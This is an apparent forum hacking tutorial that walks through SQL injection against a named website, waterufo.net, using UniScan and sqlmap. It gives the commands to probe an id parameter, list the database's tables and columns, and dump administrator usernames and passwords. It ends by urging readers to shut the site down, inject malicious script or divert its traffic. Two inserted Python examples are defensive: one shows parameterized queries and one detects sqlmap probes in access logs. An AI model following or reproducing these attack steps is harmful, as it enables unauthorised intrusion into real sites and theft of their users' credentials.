What Do We Need For This Attack?
Backtrack 5 (would work on Windows too; just find an SQL injection tool)
SQLMAP - Automatic SQL injection and database takeover tool (Included in Backtrack)
Internet Access
Brains And Balls.
Lots Of Time.
Step 1: Finding A Vulnerable Link.
This is the most difficult step in the whole process, because a website has thousands of links and only some of them are open to SQL injection. So how do you find them?
The trick is to dig into the website and look for anything that might be pulling data from a backend server.
We will use a scanner shipped with Backtrack called "UniScan", which is good at finding vulnerable links. To open it, type this in your console (Backtrack terminal):
cd /pentest/web/uniscan && ./uniscan.pl
Follow the on-screen prompts and run the tool to find the buggy links; of course you can use other scanners too.
Once you have found a link, check it by adding a single quote (') at the very end of the link.
Any parameter after the "php?" and the "=" (an id or almost anything else) can be tested,
because we know the page selects something from the database using that value, so it might be an entry point.
For Example :
Original "vulnerable" Link : http://www.waterufo.net/item.php?id=200
After adding the symbol : http://www.waterufo.net/item.php?id=200'
If a MySQL error appears, the page is most likely vulnerable to SQL injection.
Example of a MySQL error:
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''
YAYY !
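Why the single quote produces that error, shown as an added example that is not part of the original post: the page's query is built by pasting the id straight into the SQL text, so an unbalanced quote breaks the statement and the database complains. The block below uses an in-memory SQLite database as a stand-in for the MySQL backend behind item.php (the table, rows and function names are constructed for this demo), and puts the concatenated query next to the parameterized one that a fixed site would use.

```python
"""
Added example, not code from the original post or from waterufo.net.
Shows why `item.php?id=200'` raises a database error when the id is
concatenated into the SQL text, and how binding the value (and checking
that it is a number) removes that behaviour.  SQLite stands in for MySQL.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a small in-memory 'items' table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?)",
        [(199, "UFO sighting, Lake Erie"), (200, "Water reflection, Nevada")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, item_id: str) -> str:
    """String-concatenated query: the pattern that a `'` probe exposes.

    Returns the title, or the raw database error text that a careless page
    would print (the SQLite equivalent of the MySQL message in the post).
    """
    sql = "SELECT title FROM items WHERE id = " + item_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:  # an unbalanced quote breaks the statement
        return f"DB error: {exc}"
    return row[0] if row else "not found"


def lookup_parameterized(conn: sqlite3.Connection, item_id: str) -> str:
    """Hardened form: the id is validated as an integer and bound as a
    parameter, so it is never parsed as part of the SQL statement."""
    try:
        id_int = int(item_id)
    except ValueError:
        return "invalid id"  # reject "200'" up front instead of querying
    row = conn.execute(
        "SELECT title FROM items WHERE id = ?", (id_int,)
    ).fetchone()
    return row[0] if row else "not found"


if __name__ == "__main__":
    db = make_db()
    for probe in ("200", "200'"):
        print(f"vulnerable   id={probe!r}: {lookup_vulnerable(db, probe)}")
        print(f"parameterized id={probe!r}: {lookup_parameterized(db, probe)}")
```

With the concatenated version, the `200'` probe returns a "DB error: ..." string, which is exactly the signal the tutorial is looking for; with the bound parameter the same input is rejected before it reaches the database, and a real site would also log the error server-side rather than echoing it to the visitor.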
Step 2: Starting and Setting Up SQLMap:
SQLMap is the best SQL injection tool ever made; it is good for both beginners and experts. To start it, type the command below in the console:
cd /pentest/web/scanners/sqlmap
Once it has started, adapt this command to your requirements and press Enter:
./sqlmap.py -u (your bug link here) --level 5 --risk 3 --dbs
This command will scan the whole website with the help of the vulnerable link you inserted.
Now let the scan continue and wait for something like this:
If this appears, you have found your way inside that website; now press N to stop the scan, because the vulnerability has already been found and exploited.
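What the scan in Step 2 looks like from the other side, as an added example that is not part of the original post: a sqlmap run with --level 5 --risk 3 sends many requests to the same script with the id parameter varied, and by default it identifies itself with a User-Agent beginning with "sqlmap/". The block below parses a few constructed Apache combined-format access log lines (the hostname is the page's own example target; the IPs, timestamps and sqlmap version string are made up) and flags the quote probe from Step 1, the sqlmap User-Agent, and the 500 that suggests the error message was echoed to the client.

```python
"""
Added example, not code from the original post.  Flags the SQL injection
probing described in Steps 1 and 2 in a web server access log.
All log lines below are constructed for the demo.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /item.php?id=200 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "GET /item.php?id=200' HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /item.php?id=200%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2023:13:56:31 +0000] "GET /item.php?id=200%20AND%201%3D2 HTTP/1.1" 200 4010 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.2 - - [10/Oct/2023:13:57:00 +0000] "GET /item.php?id=199 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Tokens that have no business inside a numeric id parameter.  Tuned for
# ids; a free-text search field would need a narrower rule ("or" is a word).
SQLI_TOKEN_RE = re.compile(
    r"""['"]|--|/\*|\b(?:and|or|union|select|sleep)\b""", re.IGNORECASE
)


def parse_line(line: str):
    """Return a dict of fields, with the query string decoded into params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl URL-decodes, so %20AND%201%3D1 becomes " AND 1=1".
    rec["params"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return rec


def find_alerts(log_text: str):
    """Return (alerts, probes_per_ip).

    alerts: list of (ip, target, [reasons]) for every suspicious request.
    probes_per_ip: how many requests per client carried SQL tokens; a
    burst from one address against one script is the sqlmap signature.
    """
    alerts = []
    probes_per_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if rec["ua"].lower().startswith("sqlmap/"):
            reasons.append("sqlmap user-agent")
        for name, value in rec["params"].items():
            if SQLI_TOKEN_RE.search(value):
                reasons.append(f"sql token in parameter {name!r}")
                probes_per_ip[rec["ip"]] += 1
                break
        if reasons and rec["status"] == "500":
            reasons.append("server error on probe: check that the DB error is not echoed")
        if reasons:
            alerts.append((rec["ip"], rec["target"], reasons))
    return alerts, probes_per_ip


if __name__ == "__main__":
    found, per_ip = find_alerts(SAMPLE_LOG)
    for ip, target, why in found:
        print(f"{ip} {target}: {', '.join(why)}")
    print("probe counts:", dict(per_ip))
```

The first hit (the bare quote with a 500 response) is the Step 1 test; the next two carry the sqlmap User-Agent and boolean payloads in the id parameter. Changing the User-Agent is trivial, so the per-IP probe counter and the token check on the parameter are the parts worth keeping in a real rule, alongside the server-side fix of not leaking the database error at all.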
Step 3: Finding The Columns And Tables (The Guessing Game) -
As we all know, the data on a website is stored in databases; inside those databases there are tables and columns, and inside them is the data we want.
Suppose the database is waterufo_net (change it as per your requirements; I am just supposing so you can follow along). We now type this command to list the tables:
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net
You will get something like this:
Now run this command to grab the columns:
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net
It will display the columns in the table "fl_users", something like this:
Step 4: Retrieving Usernames And Passwords -
To retrieve the column values, add --dump to the end of the previous command.
For example:
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump
You will be presented with the values stored in those columns; in my case, that was the list of administrator usernames and passwords:
So now you have the administrator usernames and passwords, and you can do a lot of things with them, for example:
-> Shut down the website.
-> Insert a malicious script into the website.
-> Divert their traffic somewhere else.
-> Write those passwords on a brick and hit your neighbor's kid.
Any of the above will do a lot of damage.